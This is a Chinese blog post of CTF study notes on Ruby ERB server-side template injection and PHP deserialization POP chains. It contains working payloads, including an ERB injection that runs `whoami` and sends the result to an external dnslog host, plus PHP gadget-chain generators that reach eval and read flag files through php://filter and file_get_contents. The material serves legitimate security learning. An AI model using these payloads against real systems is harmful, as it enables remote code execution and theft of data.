Ruby ERB注入&&反序列化

于 2022-06-07 23:14:58 发布
阅读量836 收藏 1
点赞数 1
分类专栏: CTF 安全 文章标签: ruby angular.js 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53142368/article/details/124000888
版权
安全 同时被 2 个专栏收录
23 篇文章 2 订阅
订阅专栏
CTF
18 篇文章 0 订阅
订阅专栏

请添加图片描述
生活不易

Ruby ERB注入

现在的Web应用中,许多客户端以及服务器端经常会用到模板。许多模板引擎提供了多种不同的编程语言实现,比如Smarty、Mako、Jinja2、Jade、Velocity、Freemaker以及Twig等模板。作为注入攻击大家族中的一员,模板注入这种攻击形式对不同的目标所造成的影响也有所不同。对于AngularJS而言,模板注入攻击可以达到XSS攻击效果,对于服务器端的注入攻击而言,模板注入攻击可以达到远程代码执行效果。

ERB时Ruby自带的

<% 写逻辑脚本(Ruby语法) %>
<%= 直接输出变量值或运算结果 %>

如果x是可控的,跟普通模板注入一样

require 'erb'

template = "text to be generated: <%= x %>"
erb_object = ERB.new(template)
x = 7*7
puts erb_object.result(binding())

呢么读取X的话 得到的就是49
假如以此类推,读取一个文件

require 'erb'

template = "text to be generated: <%= x %>"
erb_object = ERB.new(template)
x = File.open('pwd.txt').read
puts erb_object.result(binding())

  if params[:do] == "#{params[:name][0,7]} is working" then

    auth["jkl"] = auth["jkl"].to_i + SecureRandom.random_number(10)
    auth = JWT.encode auth,ENV["SECRET"] , 'HS256'
    cookies[:auth] = auth
    ERB::new("<script>alert('#{params[:name][0,7]} working successfully!')</script>").result

  end
end

第一种:jwt解密
这段代码意思就是如果传入的参数do和name一致,则会输出params[:name][0,7]} working successfully!
这里有erb模板,并且直接把可控参数name拼接进去了,但这里有限制,最多最多只能要七个字符,除去<%=%>只剩两个字符可以操作
$'-最后一次成功匹配右边的字符串

work?SECRET=&name=%3c%25%3d%24%27%25%3e&do=%3c%25%3d%24%27%25%3e%20is%20working

在这里插入图片描述
然后将secret填入和JKL修改
得到的JWT到shop页面进行购买,然后修改为post传参 shop页面
在这里插入图片描述
最后进行JWT解密就是flag
第二种:利用HTTP参数传递类型差异
利用HTTP参数传递类型差异的问题。url传参可以传入非字符串以外的其他数据类型,比如数组从而绕过一些程序逻辑

$a = "mon123"
$b = Array["aaa","bbb","ccc"]
puts "$a: #{$a[0,3]}"
puts "$b: #{$b[0,3]}"

这里,$b原本是数组,但是因为被拼接到了字符串中,所以数组默认的类型变成了[“aaa”, “bbb”, “ccc”],这样上面代码的限制,从原本的7个字符,变成了7个数组长度
payload:

/work?name[]=<%=system('ping -c 1 `whoami`.xuu1g4.dnslog.cn')%>&name[]=1&name[]=2&name[]=3&name[]=4&name[]=5&name[]=6&do=["<%=system('ping -c 1 `whoami`.xuu1g4.dnslog.cn')%>", "1", "2", "3", "4", "5", "6"] is working

url编码一下

/work?name[]=%3C%25%3Dsystem(%27ping%20-c%201%20%60whoami%60.xuu1g4.dnslog.cn%27)%25%3E&name[]=1&name[]=2&name[]=3&name[]=4&name[]=5&name[]=6&do=%5B%22%3C%25%3Dsystem(%27ping%20-c%201%20%60whoami%60.xuu1g4.dnslog.cn%27)%25%3E%22%2C%20%221%22%2C%20%222%22%2C%20%223%22%2C%20%224%22%2C%20%225%22%2C%20%226%22%5D%20is%20working

最后得到任意代码执行

反序列化

发序列化的题目做的不是很好,在构造PO链的时候,会有些不懂,进行系统补充学习一下。
还是从代码先入手

<?php
highlight_file(__FILE__);
class test {
    protected $ClassObj;
    function __construct() {
        $this->ClassObj = new normal();
    }
    function __destruct() {
        $this->ClassObj->action();
    }
}
class normal {
    function action() {
        echo "HelloWorld";
    }
}
class evil {
    private $data;
    function action() {
        eval($this->data);
    }
}

unserialize($_GET['a']);
?>

这个例子,test类中的_destruct()调用了action方法,但在_construct()中可以看出它创建了一个normal类的对象,然后调用的是normal类中的action方法,

<?php
class test {
    protected $ClassObj;
}
class evil {
    private $data='phpinfo();';
}
$a = new evil();
$b = new test();
$b -> ClassObj = $a;
echo serialize(urlencode($a));
?>

构造出来这样,创建一个evil类的对象然后把它赋值给classobj属性,但classobj是protected属性,不能在类外面访问,所以要在test类里面写一个_construct()来完成操作。

<?php
class test {
    protected $ClassObj;
    function __construct() {
        $this->ClassObj = new evil();
    }
}
class evil {
    private $data='phpinfo();';
}
$a = new test();
echo urlencode(serialize($a));
?>

下一个代码分析

<?php
highlight_file(__FILE__);
class Hello
{
    public $source;
    public $str;
    public function __construct($name)
    {
        $this->str=$name;
    }
    public function __destruct()
    {
        $this->source=$this->str;
        echo $this->source;
    }
}
class Show
{
    public $source;
    public $str;
    public function __toString()
    {
        $content = $this->str['str']->source;
        return $content;
    }
}

class Uwant
{
    public $params;
    public function __construct(){
        $this->params='phpinfo();';
    }
    public function __get($key){
        return $this->getshell($this->params);
    }
    public function getshell($value)
    {
        eval($this->params);
    }
}
$a = $_GET['a'];
unserialize($a);
?>

先进行思路分析,先找链子的头和尾,头部是GET传参,尾部是Uwant类中的getshell,然后从下往上看,Uwant类中的__get()中调用了getshell,Show类中的toString调用了__get(),然后Hello类中的__destruct(),我们get传参之后会先进入_destruct(),呢么完整的链子就是
从头部开始->Hello:_destruct() ->Show:_tostring() -> Uwant: _get() -> Uwant :getshell ->尾部
在Hello类中我们要把$this->str 赋值成对象,下面echo出来才能调用show类中的_tosting(),然后再把show类中的this->str[‘str’]赋值成对象,来调用Uwant类中的_get()

<?php
class Hello
{
    public $source;
    public $str;
}
class Show
{
    public $source;
    public $str;
}
class Uwant
{
    public $params='phpinfo();';
}
$a = new Hello();
$b = new Show();
$c = new Uwant();
$a -> str = $b;
$b -> str['str'] = $c;
echo urlencode(serialize($a));

下一个例子

Welcome to index.php
<?php
//flag is in flag.php
//WTF IS THIS?
//Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95
//And Crack It!
class Modifier {
    protected  $var;
    public function append($value){
        include($value);
    }
    public function __invoke(){
        $this->append($this->var);
    }
}

class Show{
    public $source;
    public $str;
    public function __construct($file='index.php'){
        $this->source = $file;
        echo 'Welcome to '.$this->source."<br>";
    }
    public function __toString(){
        return $this->str->source;
    }

    public function __wakeup(){
        if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
            echo "hacker";
            $this->source = "index.php";
        }
    }
}

class Test{
    public $p;
    public function __construct(){
        $this->p = array();
    }

    public function __get($key){
        $function = $this->p;
        return $function();
    }
}

if(isset($_GET['pop'])){
    @unserialize($_GET['pop']);
}
else{
    $a=new Show;
    highlight_file(__FILE__);
}

思路分析,还是先找链子的头和尾,头部依然是一个GET传参,而尾部在Modifier类中的append()方法中,因为里面有个include可以完成任意文件包含,那我们很容易就可以想到用伪协议来读文件。然后找到尾部后往上看,
在Modifier类中的__invoke()调用了append(),然后在Test类中的__get()返回的是$function(),可以调用__invoke(),再往前Show类中的__toString()可以调用__get(),然后在Show类中的__wakeup()中有一个正则匹配,可以调用__toString(),然后当我们传入字符串,反序列化之后最先进入的就是__wakeup()
在这里插入图片描述
构造链子的话
头部开始->Show::__wakeup() -> Show::__toString() -> Test::__get() -> Modifier::__invoke() -> Modifier::append -> 尾

<?php
class Modifier {
    protected  $var = 'php://filter/read=convert.base64-encode/resource=flag.php';
}

class Show{
    public $source;
    public $str;
}

class Test{
    public $p;
}
$a = new Show();
$b = new Show();
$c = new Test();
$d = new Modifier();
$a -> source = $b;
$b -> str = $c;
$c -> p = $d;
echo urlencode(serialize($a));

?>

下个例子

<meta charset="utf-8">
<?php
//hint is in hint.php
error_reporting(1);


class Start
{
    public $name='guest';
    public $flag='syst3m("cat 127.0.0.1/etc/hint");';
    
    public function __construct(){
        echo "I think you need /etc/hint . Before this you need to see the source code";
    }

    public function _sayhello(){
        echo $this->name;
        return 'ok';
    }

    public function __wakeup(){
        echo "hi";
        $this->_sayhello();
    }
    public function __get($cc){
        echo "give you flag : ".$this->flag;
        return ;
    }
}

class Info
{
    private $phonenumber=123123;
    public $promise='I do';
    
    public function __construct(){
        $this->promise='I will not !!!!';
        return $this->promise;
    }

    public function __toString(){
        return $this->file['filename']->ffiillee['ffiilleennaammee'];
    }
}

class Room
{
    public $filename='/flag';
    public $sth_to_set;
    public $a='';
    
    public function __get($name){
        $function = $this->a;
        return $function();
    }
    
    public function Get_hint($file){
        $hint=base64_encode(file_get_contents($file));
        echo $hint;
        return ;
    }

    public function __invoke(){
        $content = $this->Get_hint($this->filename);
        echo $content;
    }
}

if(isset($_GET['hello'])){
    unserialize($_GET['hello']);
}else{
    $hi = new  Start();
}

?>

首先还是找头和尾部,头部还是get传参,尾部可以看到Room类中有个Get_hint()方法,里面有一个file_get_contents,可以实现任意文件读取,我们就可以利用这个读取flag文件了,然后就是往前倒推,Room类中__invoke()方法调用了Get_hint(),然后Room类的__get()里面有个return $function()可以调用__invoke(),再往前看,Info类中的__toString()中有Room类中不存在的属性,所以可以调用__get(),然后Start类中有个_sayhello()可以调用__toString(),然后在Start类中__wakeup()方法中直接调用了_sayhello(),而我们知道的是,输入字符串之后就会先进入__wakeup(),这样头和尾就连上了
在这里插入图片描述
这样的话 链的构造就是
头 -> Start::__wakeup() -> Start::_sayhello() -> Info::__toString() -> Room::__get() -> Room::invoke() -> Room::Get_hint()

<?php
class Start
{
    public $name='guest';
    public $flag='syst3m("cat 127.0.0.1/etc/hint");';
}

class Info
{
    private $phonenumber=123123;
    public $promise='I do';
    
    public function __construct(){
        $this->promise='I will not !!!!';
        return $this->promise;
    }
}
class Room
{
    public $filename='/flag';
    public $sth_to_set;
    public $a='';
}
$a = new Start();
$b = new Info();
$c = new Room();
$d = new Room();
$a -> name = $b;
$b -> file['filename'] = $c;
$c -> a = $d;
echo urlencode(serialize($a));
?>
H0ne
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Ruby ERB模板注入检测
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
12-06 522
​了解Ruby ERB模板注入Ruby ERB模板注入检测。 ERBRuby自带的 require 'erb' template = "text to be generated: " erb_object = ERB.new(template) x = 5 puts erb_object.result(binding()) x = 4 puts erb_object.result(binding())
【漏洞挖掘】——20、RFD漏洞介绍挖掘
Fly_鹏程万里
03-03 2007
RFD(Reflected File Download)即反射型文件下载漏洞,2014年在BlackHat中被提出,该漏洞在原理上类似XSS,在危害上类似DDE,攻击者可以通过一个URL地址使用户下载一个恶意文件,从而危害用户的终端PC,不过这个漏洞很罕见,大多数公司会认为它是一个需要结合社工的低危漏洞,但微软,雅虎,eBay,PayPal和其他许多公司认为这是一个中危漏洞。
RubyERB模板的使用
03-16
code 博文链接:https://lj6684.iteye.com/blog/410424
Lab: Exploiting Ruby deserialization using a documented gadget chain:使用小工具链利用 Ruby 反序列化Ruby 2.x Uni...
Zeker62的博客
08-23 702
靶场内容: 本实验使用基于序列化的会话机制和 Ruby on Rails 框架。有一个记录的漏洞利用可以通过此框架中的小工具链实现远程代码执行。 要解决实验室问题,请查找记录的漏洞利用并对其进行调整以创建包含远程代码执行有效负载的恶意序列化对象。然后,将此对象传递到网站以morale.txt从 Carlos 的主目录中删除该文件。 解决方法: 登录到您自己的帐户并注意会话 cookie 包含一...
强大的ruby模版:ERB
johnny_hg的专栏
10-28 1299
#http://stdlib.rubyonrails.org/ [code="ruby"] require "erb" # Build template data class. class Product def initialize( code, name, desc, cost ) @code = code @name = name ...
小型ERB实施-Ruby开发
05-27
Erubi Erubi是用于rubyERB模板引擎。 它是Erubis的简化分支,但有以下区别:使用转义时处理后缀条件(例如,<%= foo,如果bar%>)支持Frozen_string_literErubi¶↑Erubi是rubyERB模板引擎。 它是Erubis的...
ytrbium:Ruby中的简单YAML + ERB模板
03-18
Ytrbium是Ruby中一个简单的YAML + ERB模板库。 与Y: 从可重用模板生成大型的冗长的YAML文件。 收集和整理可重复使用的模板方法在多个文件和import他们到每个模板。 正确直观地缩进模板项。 安装 将此行添加到您...
Ruby-Erubi是rubyERB模板引擎
08-15
**Ruby-Erubi:深入理解ERB模板引擎** 在Ruby世界中,模板引擎是一种用于将数据和HTML(或其他标记语言)结合在一起的工具,它允许开发者以编程方式动态生成网页内容。Erubi就是这样一个轻量级、高效的ERB...
erb_sql_templates:Ruby Gem 使用 ERB 自定义大型 SQL 查询
06-15
RubyERB SQL 模板 当您不希望将大型复杂 SQL 查询作为字符串嵌入到 Ruby 中时,请使用erb_sql_templates 。 gem 允许将 SQL 存储在它们自己的目录和文件中,并且可以使用 ERB 自定义查询。 例子 示例 SQL 模板...
Ruby学习之ERB模板
weixin_34101784的博客
06-18 866
Ruby读取XML使用REXML没话说,方便快捷,但Ruby创建XML呢? 工作上需要使用程序根据规则自动生成一个XML数据文件,准备用Ruby实现,上网查了一些Ruby创建XML文档的介绍,10篇有9篇都是转载那一个文章,使用Builder::XmlMarkup操作,但文章介绍的也太简单了,琢磨半天也没想明白怎么制作稍微复杂一点点的嵌套结构; 如果这个工作用...
Ruby NetFTP 模块命令注入漏洞(CVE-2017-17405)
黑白的博客
12-14 964
声明 好好学习,天天向上 漏洞描述 Ruby Net::FTP 模块是一个FTP客户端,在上传和下载文件的过程中,打开本地文件时使用了open函数。而在ruby中,open函数是借用系统命令来打开文件,且没用过滤shell字符,导致在用户控制文件名的情况下,将可以注入任意命令。 影响范围 Ruby 2.2系列:2.2.8及更早版本 Ruby 2.3系列:2.3.5及更早版本 Ruby 2.4系列:2.4.2及更早版本 Ruby 2.5系列:2.5.0-preview1 在主干修订版r61242之前 复现
模板文件, ruby erb 与 python format
长虹剑的专栏
01-17 464
有这样的一个需求,就是把一个文件中某些位置的字符串作为变量,然后通过程序生成。 比如有个文件 1+1=2 如何替换那些数字为其他字符串,然后生成这个文件。 ruby erb 说实话这个有点大材小用了。 因为erb还支持语句生成字符串 首先把模板文件写为 test.erb <%=a%>+<%=b%>=<%=c%> 然后用以下程序处理 def my_bindin...
ERB预处理ruby代码
weixin_30369087的博客
03-29 109
cucumber.yml 文件可以用erb预处理,这样允许你在cucumber.yml文件中使用ruby代码生成值。所以如果你有几个配置要用相同值时,你可以这样写 # config/cucumber.yml ##YAML Template --- <% common = "--tags ~@wip --strict" %> default: <%= common %...
动手写rails(二)Rails_Ruby_ERB使用_模板_定制
fantaxy025025的专栏
04-07 615
动手写rails(二)Rails_Ruby_ERB使用_模板_定制   一。基础:基本知识   先看例子代码: 例子1: require "erb" #例子1: erb = ERB.new("I am &lt;%= 'Fantaxy' %&gt;") puts "例子1:" puts erb.result puts erb.src   输出: 例子1: I am ...
ERb
yacole的专栏
12-14 467
ERb - 嵌入式Ruby语言
热门Ruby 库中存在严重的命令注入漏洞
smellycat000的专栏
04-11 358
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士开发人员修复了用于解析和转换 AsciiDoc 文件的热门 Ruby库中存在一个命令注入漏洞。命令注入漏洞可使攻击者在运行应用程序的服务器上执行任意操作系统命令,一般可导致该应用程序及其所有数据遭完全攻陷。这个Ruby 库是 asciidoctor-include-ext,它是Asciidoctor 库的扩展,可将远程 ...
模板注入学习
qq_44111753的博客
02-03 2365
模板引擎:是为了使用户界面与业务数据(内容)分离而产生的,它可以生成特定格式的文档,用于网站的模板引擎就会生成一个标准的HTML文档。 模板渲染:拿到数据,塞到模板里,然后让渲染引擎将塞进去的东西生成 html 的文本,返回给浏览器 好处:展示数据快,大大提升效率。 后端渲染:服务器计算好最终的html字符串发送给用户,即浏览器只需要进行html解析以及通过操作系统提供的操纵显示器显示内容的系统调用在显示器上把HTML所代表的图像显示给用户。 好处:模板统一在后盾,前端(相对)省事,不占用客户端运算资
erb模板预定义方法
YongYu_IT的专栏
02-02 514
debug link_to button_to
makefile脚本 erb -T 是什么意思
最新发布
05-31
ERB模板引擎是一个Ruby标准库,用于将ERB模板文件编译为普通文本文件。`erb -T`命令允许您查看可用的ERB模板引擎选项及其说明。 例如,运行以下命令: ``` erb -T ``` 将列出可用的ERB模板引擎选项及其说明。例如...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值